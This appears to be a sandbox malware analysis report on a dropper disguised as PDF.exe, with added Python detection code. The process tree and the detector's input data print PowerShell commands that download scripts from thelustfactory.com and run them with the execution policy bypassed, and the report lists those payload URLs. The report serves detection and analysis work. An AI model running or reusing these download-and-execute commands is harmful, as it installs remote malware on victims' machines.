Resubmissions
- 21/01/2025, 13:31  250121-qspexswjes  score 10
- 21/01/2025, 12:04  250121-n8tngasrhm  score 10
- 13/07/2024, 12:59  240713-p8a2ss1gpq  score 10

Analysis
- Max time kernel: 117s
- Max time network: 124s
- Platform: windows7_x64
- Resource: win7-20240903-en
- Resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
- Submitted: 21/01/2025, 12:04
Static task
- static1

Behavioral tasks (sample: PDF.exe in every task)
- behavioral1: win7-20240903-en
- behavioral2: win10v2004-20241007-en
- behavioral3: android-x86-arm-20240624-en
- behavioral4: android-33-x64-arm64-20240624-en
- behavioral5: macos-20241101-en
- behavioral6: ubuntu1804-amd64-20240729-en
- behavioral7: debian9-armhf-20240729-en
- behavioral8: debian9-mipsbe-20240611-en
- behavioral9: debian9-mipsel-20240418-en
General
- Target: PDF.exe
- Size: 258KB
- MD5: 34c2047d0b69ba023b700c21431accc0
- SHA1: e34c28611707c81565cb73d8a1a46dfc3ab2495a
- SHA256: ff9b39d07fd6e4a7f98d109664d91de9e318671da6412da85396541722d92799
- SHA512: a1566d65beb8135edfcb5c4a09631bc17dff56db672621990a10d0eff37a0290c7e1e9705f1918a7e719cbea4b1cecc29bb8254da946108e9bd5432070cc8ca7
- SSDEEP: 6144:VbJhs7QW69hd1MMdxPe9N9uA0hu9TBrjJ0Xxne0AqGLj:VbjDhu9TV6xeJqG3
Malware Config
Extracted
- http://thelustfactory.com/vns/1.ps1
- http://thelustfactory.com/vns/2.ps1
Signatures

Command and Scripting Interpreter: PowerShell 4 IoCs
pid   Process
2808  powershell.exe
2632  powershell.exe
2524  powershell.exe
2404  powershell.exe

HTTP links in PDF interactive object 1 IoCs
Detects HTTP links in interactive objects within PDF files.
resource                                      yara_rule
behavioral1/files/0x0006000000019275-59.dat   pdf_with_link_action
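The pdf_with_link_action signature above states the condition (an HTTP link inside a PDF interactive object) without showing how to test for it. The following is an added example, not Triage's rule and not the file dropped by this sample: a byte-level scanner run over two constructed PDFs (the example.test URLs are invented placeholders), one with the /URI action in plain text and one with the same annotation inside a FlateDecode object stream, which a plain string search over the file would miss.

```python
import re
import zlib

# Constructed minimal PDFs (not the .dat dropped in this report). Offsets and the
# xref table are omitted because the scanner works on raw bytes, not on the xref.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /Annots [4 0 R] >> endobj
4 0 obj << /Type /Annot /Subtype /Link /Rect [0 0 100 20]
  /A << /S /URI /URI (http://example.test/stage2.ps1) >> >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# Same kind of annotation, but hidden inside a FlateDecode object stream, which is
# how PDF 1.5+ writers (and evasive droppers) keep it out of a plain string search.
_HIDDEN_OBJ = (b"5 0 obj << /Type /Annot /Subtype /Link "
               b"/A << /S /URI /URI (https://example.test/hidden) >> >> endobj")
_DEFLATED = zlib.compress(_HIDDEN_OBJ)
COMPRESSED_PDF = (b"%PDF-1.5\n6 0 obj << /Type /ObjStm /Filter /FlateDecode /Length "
                  + str(len(_DEFLATED)).encode() + b" >>\nstream\n" + _DEFLATED
                  + b"\nendstream\nendobj\n%%EOF\n")

# /URI (...) literal string; handles backslash-escaped characters such as \).
# The hex-string form /URI <...> is not covered here.
URI_RE = re.compile(rb"/URI\s*\(((?:\\.|[^\\)])*)\)")
# A stream object's dictionary followed by the 'stream' keyword.
STREAM_RE = re.compile(rb"<<(.*?)>>\s*stream\r?\n", re.S)
LENGTH_RE = re.compile(rb"/Length\s+(\d+)")


def inflate_streams(pdf_bytes):
    """Decoded bytes of every FlateDecode stream with a direct /Length.
    Indirect lengths ('7 0 R') and undecodable streams are skipped; a full
    parser (pikepdf, pdfminer) is the right tool once a file gets that far."""
    out = []
    for m in STREAM_RE.finditer(pdf_bytes):
        dict_bytes = m.group(1)
        length = LENGTH_RE.search(dict_bytes)
        if b"/FlateDecode" not in dict_bytes or not length:
            continue
        body = pdf_bytes[m.end(): m.end() + int(length.group(1))]
        try:
            out.append(zlib.decompress(body))
        except zlib.error:
            continue
    return out


def find_link_uris(pdf_bytes):
    """Every URI-action target, from the raw file and from its inflated streams."""
    uris = []
    for blob in [pdf_bytes, *inflate_streams(pdf_bytes)]:
        uris.extend(m.group(1).decode("latin-1") for m in URI_RE.finditer(blob))
    return uris


def has_http_link_action(pdf_bytes):
    """The condition the report's pdf_with_link_action signature describes."""
    return any(u.lower().startswith(("http://", "https://"))
               for u in find_link_uris(pdf_bytes))


if __name__ == "__main__":
    for name, pdf in (("plain", SAMPLE_PDF), ("objstm", COMPRESSED_PDF)):
        print(name, find_link_uris(pdf), has_http_link_action(pdf))
```

A link action by itself is not malicious (most PDFs with clickable references carry one), which is why Triage reports it as an IoC rather than a verdict; the value of inflating streams first is that a dropper which hides the annotation in an object stream still surfaces the URL for the analyst to pivot on.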
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description   ioc                                                           Process
Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   AcroRd32.exe

Delays execution with timeout.exe 1 IoCs
pid   Process
2388  timeout.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid   Process
2676  AcroRd32.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs
pid   Process
2808  powershell.exe
2632  powershell.exe
2404  powershell.exe
2524  powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid   Process
2676  AcroRd32.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs
description               pid   Process
Token: SeDebugPrivilege   2808  powershell.exe
Token: SeDebugPrivilege   2632  powershell.exe
Token: SeDebugPrivilege   2404  powershell.exe
Token: SeDebugPrivilege   2524  powershell.exe

Suspicious use of SetWindowsHookEx 3 IoCs
pid   Process
2676  AcroRd32.exe  (3 entries)

Suspicious use of WriteProcessMemory 22 IoCs
Each write is recorded several times in the report; the entries column gives the count (22 in total).
description                        pid   Process   procid_target   entries
PID 2244 wrote to memory of 2732   2244  PDF.exe   30              3
PID 2732 wrote to memory of 2808   2732  cmd.exe   32              3
PID 2732 wrote to memory of 2632   2732  cmd.exe   33              3
PID 2732 wrote to memory of 2404   2732  cmd.exe   34              3
PID 2732 wrote to memory of 2524   2732  cmd.exe   35              3
PID 2732 wrote to memory of 2388   2732  cmd.exe   36              3
PID 2732 wrote to memory of 2676   2732  cmd.exe   37              4
Processes

[1] C:\Users\Admin\AppData\Local\Temp\PDF.exe  (PID 2244)
    Command line: C:\Users\Admin\AppData\Local\Temp\PDF.exe sh $MOZILLA\nPLUGIN %SIGILL% "SIGTERM|DESTROY|SIGKILL"
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\system32\cmd.exe  (PID 2732)
      Command line: "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\42EA.tmp\42EB.tmp\42EC.bat C:\Users\Admin\AppData\Local\Temp\PDF.exe sh $MOZILLA\nPLUGIN %SIGILL% "SIGTERM|DESTROY|SIGKILL""
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2808)
        Command line: powershell -Command "(New-Object Net.WebClient).DownloadFile('http://thelustfactory.com/vns/1.ps1', 'C:\Users\Admin\AppData\Roaming\1.ps1')"
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2632)
        Command line: powershell -Command "(New-Object Net.WebClient).DownloadFile('http://thelustfactory.com/vns/2.ps1', 'C:\Users\Admin\AppData\Roaming\2.ps1')"
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2404)
        Command line: powershell -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\1.ps1
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2524)
        Command line: powershell -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\2.ps1
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\system32\timeout.exe  (PID 2388)
        Command line: timeout /t 5
        - Delays execution with timeout.exe

    [3] C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe  (PID 2676)
        Command line: "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\pdf.pdf"
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: CmdExeWriteProcessMemorySpam
        - Suspicious behavior: GetForegroundWindowSpam
        - Suspicious use of SetWindowsHookEx
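The tree above is the whole infection chain: PDF.exe spawns cmd.exe on a dropped batch file, which fetches 1.ps1 and 2.ps1 with Net.WebClient, runs each with -ExecutionPolicy Bypass, waits five seconds, then opens pdf.pdf in Acrobat Reader as a decoy. As an added example that is not part of the report, the following Python reconstructs that chain from the report's own pid, parent, image and command-line values (typed in by hand here; this is not a Triage export format) and flags the download-then-execute pairs and the decoy viewer. The parent pid 0 for PDF.exe and the abbreviated -ep/-ex/-exec switches in the bypass check are assumptions, not values from the page.

```python
import re
from collections import defaultdict

# Constructed input: the process tree from this report as
# (pid, parent pid, image path, command line). Parent pid 0 marks the root,
# whose own parent the report does not show.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PROCESSES = [
    (2244, 0, r"C:\Users\Admin\AppData\Local\Temp\PDF.exe",
     r'''C:\Users\Admin\AppData\Local\Temp\PDF.exe sh $MOZILLA\nPLUGIN %SIGILL% "SIGTERM|DESTROY|SIGKILL"'''),
    (2732, 2244, r"C:\Windows\system32\cmd.exe",
     r'''"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\42EA.tmp\42EB.tmp\42EC.bat C:\Users\Admin\AppData\Local\Temp\PDF.exe sh $MOZILLA\nPLUGIN %SIGILL% "SIGTERM|DESTROY|SIGKILL""'''),
    (2808, 2732, PS,
     r'''powershell -Command "(New-Object Net.WebClient).DownloadFile('http://thelustfactory.com/vns/1.ps1', 'C:\Users\Admin\AppData\Roaming\1.ps1')"'''),
    (2632, 2732, PS,
     r'''powershell -Command "(New-Object Net.WebClient).DownloadFile('http://thelustfactory.com/vns/2.ps1', 'C:\Users\Admin\AppData\Roaming\2.ps1')"'''),
    (2404, 2732, PS, r"powershell -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\1.ps1"),
    (2524, 2732, PS, r"powershell -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\2.ps1"),
    (2388, 2732, r"C:\Windows\system32\timeout.exe", "timeout /t 5"),
    (2676, 2732, r"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe",
     r'''"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\pdf.pdf"'''),
]

# (New-Object Net.WebClient).DownloadFile('<url>', '<path>') with single-quoted arguments
DOWNLOAD_RE = re.compile(r"DownloadFile\(\s*'([^']+)'\s*,\s*'([^']+)'\s*\)", re.I)
# -File <path>, optionally double-quoted
FILE_RE = re.compile(r"-File\s+\"?([^\s\"]+)", re.I)
# -ExecutionPolicy Bypass plus the commonly seen abbreviations (assumed: -ep, -ex, -exec)
BYPASS_RE = re.compile(r"-(?:ExecutionPolicy|ep|ex|exec)\s+Bypass", re.I)


def _norm(path):
    return path.strip("'\"").lower()


def _is_powershell(image):
    return image.lower().endswith(("powershell.exe", "pwsh.exe"))


def process_tree(procs):
    """Map each parent pid to its children, in report order."""
    tree = defaultdict(list)
    for pid, ppid, _, _ in procs:
        tree[ppid].append(pid)
    return dict(tree)


def is_bypass(cmdline):
    return BYPASS_RE.search(cmdline) is not None


def download_then_execute(procs):
    """Pair each DownloadFile(url, path) with a later 'powershell -File path' on
    the same path. One hit per fetched script: who fetched it and who ran it."""
    downloads = {}  # normalized path -> (url, downloading pid)
    hits = []
    for pid, _, image, cmd in procs:
        if not _is_powershell(image):
            continue
        m = DOWNLOAD_RE.search(cmd)
        if m:
            downloads[_norm(m.group(2))] = (m.group(1), pid)
            continue
        m = FILE_RE.search(cmd)
        if m and _norm(m.group(1)) in downloads:
            url, dl_pid = downloads[_norm(m.group(1))]
            hits.append({"url": url, "path": m.group(1), "download_pid": dl_pid,
                         "exec_pid": pid, "bypass": is_bypass(cmd)})
    return hits


def decoy_viewers(procs, hits):
    """Acrobat Reader instances launched by the same parent as a download-then-execute
    pair: the decoy that gives the victim a PDF to look at while the scripts run."""
    parent_of = {pid: ppid for pid, ppid, _, _ in procs}
    parents = {parent_of[h["exec_pid"]] for h in hits}
    return [pid for pid, ppid, image, _ in procs
            if ppid in parents and image.lower().endswith("acrord32.exe")]


if __name__ == "__main__":
    found = download_then_execute(PROCESSES)
    for h in found:
        print(f"{h['url']} -> {h['path']}  fetched by {h['download_pid']}, "
              f"run by {h['exec_pid']}, bypass={h['bypass']}")
    print("decoy viewers:", decoy_viewers(PROCESSES, found))
```

Applied to live telemetry (Sysmon event ID 1 or an EDR process feed) the same four fields per process are enough; the pairing on the downloaded path is what separates this chain from a benign admin script that happens to use -ExecutionPolicy Bypass, and the decoy check explains the otherwise odd AcroRd32.exe sibling of the four PowerShell processes.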
Network
MITRE ATT&CK Enterprise v15
Downloads

1. Filesize: 712B
   MD5: 0e9ce5162ba7661c863a835f9d34d907
   SHA1: 0b351312ab57a02857753cab2287da680955f40d
   SHA256: b67f37e765a5be87d9591efdb0501f0c97aa342ad1e4c34a711828c4a505c81e
   SHA512: 8d7c0a3cc95628cbec8a215f365c3ed86746e7b350c811ace5ea4419031adbdbe75dc7d1350d9c71db51f5cbb972db4e33b1d05e9a3e2a109c559eb065811ec0

2. Filesize: 3KB
   MD5: 5a60195048a230a100a890591cc4fc6a
   SHA1: aa5fc5eabcf8f9f54d17e7a6bf7cf1dc166227d2
   SHA256: 95e9dfde83527dce5810b6b5aea9dce59c1e0794c74be085adf83746611ab30d
   SHA512: d6c46608a69715081dba7bbfd6d70f6a22af7c7db533f4936104aff89574baf2e3a6f27d505df3f8236a1e6ebc6ff39bc425141fc277006f1f4c438db0b864db

3. C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
   Filesize: 7KB
   MD5: 82b7e31b119f3d25edc1a3385ce27a4e
   SHA1: 148d968857377c20e43f0543f68781c732204d87
   SHA256: 15cd1b61b8ee20af33f9ca335d382807ef5720663a33fe0b876354dede6adeb6
   SHA512: af66c45f2e8d721f6a21df1464fbc676496fb4339cb28675a869a8242c4ab12633bd5571f678b5b5122ac704b0e2e1eed7e19303c87dfcbe4e84baf4a092f051

4. Filesize: 139KB
   MD5: 5afaf79789a776d81ec91ccbdc9fdaba
   SHA1: 6703901978dcb3dbf2d9915e1d3e066cfe712b0a
   SHA256: 38c9792d725c45dd431699e6a3b0f0f8e17c63c9ac7331387ee30dcc6e42a511
   SHA512: 09253eb87d097bdaa39f98cbbea3e6d83ee4641bca76c32c7eb1add17e9cb3117adb412d2e04ab251cca1fb19afa8b631d1e774b5dc8ae727f753fe2ffb5f288